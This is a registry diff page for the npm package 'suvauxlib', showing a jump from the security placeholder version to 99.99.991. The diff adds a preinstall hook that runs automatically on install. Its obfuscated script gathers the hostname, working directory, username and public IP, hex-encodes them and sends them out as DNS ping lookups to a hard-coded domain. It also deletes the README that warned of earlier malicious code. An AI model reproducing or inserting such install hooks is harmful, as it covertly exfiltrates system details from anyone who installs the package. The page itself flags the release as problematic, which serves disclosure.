suvauxlib 0.0.1-security → 99.99.991

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of suvauxlib might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/package.json +9 -3
  2. package/preinstall.mjs +67 -0
  3. package/README.md +0 -5
package/package.json CHANGED
@@ -1,6 +1,12 @@
1
1
  {
2
2
  "name": "suvauxlib",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "99.99.991",
4
+ "description": "test for bug bounty",
5
+ "scripts": {
6
+ "preinstall": "node preinstall.mjs"
7
+ },
8
+ "dependencies": {
9
+ "node-fetch": "^3.0.0"
10
+ },
11
+ "type": "module"
6
12
  }
package/preinstall.mjs ADDED
@@ -0,0 +1,67 @@
1
+ import { execSync as _0x8a29 } from 'child_process';
2
+ import fetch from 'node-fetch'; // Import fetch from node-fetch
3
+ import os from 'os'; // To detect the platform
4
+
5
+ const _0x7e90 = 'hn2ni928.58.nu';
6
+ const _0xLabelMax = 63; // Max length for a single DNS label
7
+ const _0xDomainMax = 253; // Max length for a full domain name (including '.' separators)
8
+
9
+ // Detect platform and set `ping` command
10
+ const _0xPingCmd = os.platform() === 'win32' ? 'ping -n 1' : 'ping -c 1';
11
+
12
+ // Obfuscated fetch for public IP
13
+ const _0x3cde = 'https://api.ipify.org'; // IP fetch URL
14
+ const _0x6b6f = ['f', 'e', 't', 'c', 'h']; // Obfuscate 'fetch'
15
+
16
+ async function _0x1b2d() {
17
+ try {
18
+ const _0x0dbf = await global[_0x6b6f.join('')](_0x3cde);
19
+ const _0x2836 = await _0x0dbf.text();
20
+ return _0x2836.trim();
21
+ } catch (_0x26f3) {
22
+ console.error('Failed to retrieve public IP:', _0x26f3);
23
+ return 'Unknown';
24
+ }
25
+ }
26
+
27
+ try {
28
+ // Collect system information
29
+ const _0x1b91 = _0x8a29('hostname').toString().trim();
30
+ const _0x7d12 = _0x8a29(os.platform() === 'win32' ? 'echo %cd%' : 'pwd', { shell: true }).toString().trim();
31
+ const _0x52b0 = _0x8a29('whoami').toString().trim();
32
+
33
+ // Get the public IP address
34
+ const _0xPublicIP = await _0x1b2d();
35
+
36
+ // Combine all information
37
+ const _0x3812 = `${_0x1b91} - ${_0x7d12} - ${_0x52b0} - ${_0xPublicIP}`;
38
+
39
+ // Convert data to hexadecimal
40
+ const _0xHexData = Buffer.from(_0x3812, 'utf8').toString('hex');
41
+
42
+ // Split hex data into labels of max 63 characters
43
+ const _0xLabels = _0xHexData.match(new RegExp(`.{1,${_0xLabelMax}}`, 'g'));
44
+
45
+ let _0xCurrentDomain = _0x7e90; // Start with the root domain
46
+ for (let i = _0xLabels.length - 1; i >= 0; i--) {
47
+ const _0xNextLabel = _0xLabels[i];
48
+ const _0xProposedDomain = `${_0xNextLabel}.${_0xCurrentDomain}`;
49
+
50
+ if (_0xProposedDomain.length > _0xDomainMax) {
51
+ // Send the current domain if the next label exceeds the domain limit
52
+ _0x8a29(`${_0xPingCmd} ${_0xCurrentDomain}`);
53
+ _0xCurrentDomain = `${_0xNextLabel}.${_0x7e90}`; // Start a new domain with the next label
54
+ } else {
55
+ _0xCurrentDomain = _0xProposedDomain;
56
+ }
57
+ }
58
+
59
+ // Send the final domain if there's remaining data
60
+ if (_0xCurrentDomain) {
61
+ _0x8a29(`${_0xPingCmd} ${_0xCurrentDomain}`);
62
+ }
63
+
64
+ console.log('Data exfiltrated via DNS.');
65
+ } catch (_0x26f3) {
66
+ console.error('Preinstall script error:', _0x26f3.message);
67
+ }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=suvauxlib for more information.